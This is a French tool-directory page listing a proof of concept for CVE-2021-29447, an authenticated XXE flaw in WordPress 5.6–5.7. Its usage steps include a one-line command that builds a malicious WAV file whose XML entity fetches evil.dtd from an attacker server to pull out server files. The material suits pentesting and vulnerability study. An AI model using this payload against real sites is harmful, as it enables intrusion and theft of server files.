Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — WordPress - Authenticated XXE (CVE-2021-29447) | Kitploit
Outils/GitHubGitHub/motikan2010/cve-2021-29447
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - Authenticated XXE (CVE-2021-29447)

Voir le dépôt
4311il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WordPress 5.6-5.7 - XXE Authentifié (Auteur+) (CVE-2021-29447)

Utilisation

Étape 1. Lancer WordPress

root@kitploit:~
$ make up-wp

Étape 2. Lancer le serveur web attaquant

root@kitploit:~
$ make up-mal

Étape 3. Générer un fichier WAV malveillant

Sans wavefile npm (Recommandé)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

Avec wavefile npm

root@kitploit:~
$ make make-wav

Étape 4. Connectez-vous à WordPress et téléchargez le fichier WAV dans Nouveau média

Étape 5. Décoder

Références

  • WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability
Télécharger l’outil